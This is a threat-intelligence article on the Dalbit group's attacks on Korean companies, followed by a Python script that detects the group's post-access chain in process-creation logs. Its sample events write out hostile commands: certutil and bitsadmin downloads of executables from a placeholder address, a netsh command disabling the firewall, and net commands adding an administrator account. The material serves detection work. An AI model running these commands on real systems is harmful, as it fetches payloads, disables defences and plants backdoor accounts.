Dalbit Threat Group Runs Attack Campaigns Against Korean Companies
Researchers from the ASEC analysis team report on a threat group tracked as Dalbit that targets Korean companies to deploy ransomware. Since 2022, Dalbit has been responsible for at least 50 attacks across industries including technology, industrial, chemical, construction, automotive, manufacturing, education, and media. The majority of the affected companies are mid- to small-sized. Several of the tools Dalbit frequently deploys, including its proxy tool, come from the Chinese community, and the group is assessed to have "a partial connection with China."
For initial access, the attackers typically exploit vulnerabilities to drop webshells such as Godzilla, ASPXSpy, AntSword, and China Chopper. "In particular, 30% of the affected companies were found to have been using a certain Korean groupware product." Dalbit actors are also documented to have exploited the WebLogic vulnerability CVE-2017-10271. Once inside the environment, Dalbit operators drop additional tools using certutil and Bitsadmin to support privilege escalation, reconnaissance, and command and control (C2) communication. After escalating privileges with one of the Potato family of exploits (BadPotato, JuicyPotato, SweetPotato, RottenPotato, EFSPotato), the operators disable the firewall and add a new account for persistence. With elevated privileges and weakened network defenses, the threat actors establish C2 communication through their proxy tool and proceed to collect credentials, emails, and other valuable data for extortion.
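Every post-access step described above (a web server worker spawning a shell, certutil or Bitsadmin pulling a file from a URL, netsh turning the firewall off, net.exe adding a local account and placing it in Administrators) leaves a process-creation event that a defender can match on. The Python script below is an added example, not code from the ASEC report or any Dalbit tool: it runs a small rule set over constructed sample events (the hostnames, timestamps, the 198.51.100.7 address and file names are invented) and then flags hosts where several distinct stages of the chain fire together, which separates an intrusion sequence from an isolated administrative use of the same binaries. The ATT&CK technique IDs are the standard mappings for each behaviour.

```python
import re
from collections import defaultdict

# Constructed sample process-creation events; not taken from the article.
# Field order: timestamp | host | parent image | image | command line
SAMPLE_EVENTS = [
    "2023-02-01T10:01:02Z|web01|w3wp.exe|cmd.exe|cmd.exe /c whoami",
    "2023-02-01T10:02:10Z|web01|cmd.exe|certutil.exe|certutil.exe -urlcache -split -f http://198.51.100.7/t.exe C:\\Windows\\Temp\\t.exe",
    "2023-02-01T10:03:15Z|web01|cmd.exe|bitsadmin.exe|bitsadmin.exe /transfer job /download /priority high http://198.51.100.7/p.exe C:\\Windows\\Temp\\p.exe",
    "2023-02-01T10:05:40Z|web01|cmd.exe|netsh.exe|netsh advfirewall set allprofiles state off",
    "2023-02-01T10:06:01Z|web01|cmd.exe|net.exe|net user support01 Pass-example1 /add",
    "2023-02-01T10:06:05Z|web01|cmd.exe|net.exe|net localgroup administrators support01 /add",
    # Benign use of certutil on a file server: no URL, should not fire.
    "2023-02-01T11:00:00Z|fs02|explorer.exe|certutil.exe|certutil.exe -verify cert.cer",
]

# Parent processes that indicate a web shell when they spawn a shell.
# The set is an assumption covering IIS, Apache and Java/WebLogic workers.
WEB_WORKERS = {"w3wp.exe", "httpd.exe", "java.exe", "tomcat.exe", "tomcat9.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
URL = re.compile(r"https?://", re.I)


def is_webshell_spawn(parent, image, cmd):
    return parent.lower() in WEB_WORKERS and image.lower() in SHELLS


def is_certutil_download(parent, image, cmd):
    # certutil fetching a remote file rather than handling a local cert
    return (image.lower() == "certutil.exe"
            and re.search(r"-urlcache\b|-split\b", cmd, re.I) is not None
            and URL.search(cmd) is not None)


def is_bitsadmin_download(parent, image, cmd):
    return (image.lower() == "bitsadmin.exe"
            and re.search(r"/transfer\b", cmd, re.I) is not None
            and URL.search(cmd) is not None)


def is_firewall_disable(parent, image, cmd):
    return (image.lower() == "netsh.exe"
            and re.search(r"advfirewall\s+set\s+\w+\s+state\s+off", cmd, re.I) is not None)


def is_account_create(parent, image, cmd):
    return (image.lower() in {"net.exe", "net1.exe"}
            and re.search(r"\buser\b.*\s/add\b", cmd, re.I) is not None)


def is_admin_group_add(parent, image, cmd):
    return (image.lower() in {"net.exe", "net1.exe"}
            and re.search(r"\blocalgroup\s+administrators\b.*\s/add\b", cmd, re.I) is not None)


# (stage name, ATT&CK technique, predicate)
RULES = [
    ("webshell_spawn", "T1505.003", is_webshell_spawn),
    ("tool_download", "T1105", is_certutil_download),
    ("tool_download", "T1105", is_bitsadmin_download),
    ("firewall_disable", "T1562.004", is_firewall_disable),
    ("account_create", "T1136.001", is_account_create),
    ("admin_group_add", "T1098", is_admin_group_add),
]


def parse_event(line):
    ts, host, parent, image, cmd = line.split("|", 4)
    return {"ts": ts, "host": host, "parent": parent, "image": image, "cmd": cmd}


def detect(lines):
    """Return (timestamp, host, stage, technique, cmdline) for each rule hit."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        for stage, tid, pred in RULES:
            if pred(ev["parent"], ev["image"], ev["cmd"]):
                findings.append((ev["ts"], ev["host"], stage, tid, ev["cmd"]))
    return findings


def hosts_with_chain(findings, min_stages=3):
    """Hosts on which at least `min_stages` distinct stages fired, i.e. the
    webshell -> tool drop -> firewall off -> new account sequence rather than
    a single, possibly legitimate, use of one of these binaries."""
    stages = defaultdict(set)
    for _, host, stage, _, _ in findings:
        stages[host].add(stage)
    return sorted(h for h, s in stages.items() if len(s) >= min_stages)


if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for ts, host, stage, tid, cmd in hits:
        print(f"{ts} {host} {stage:16} {tid:10} {cmd}")
    print("hosts with multi-stage chain:", hosts_with_chain(hits))
```

Each predicate on its own is noisy (administrators do run certutil and net.exe), so the useful signal is `hosts_with_chain`: on the sample data only web01 crosses the threshold, while the lone certutil verification on fs02 produces no finding at all. In a real pipeline the same predicates would run over Sysmon Event ID 1 or Windows Security 4688 records, with the parent-image set extended to whatever web servers the organisation actually operates.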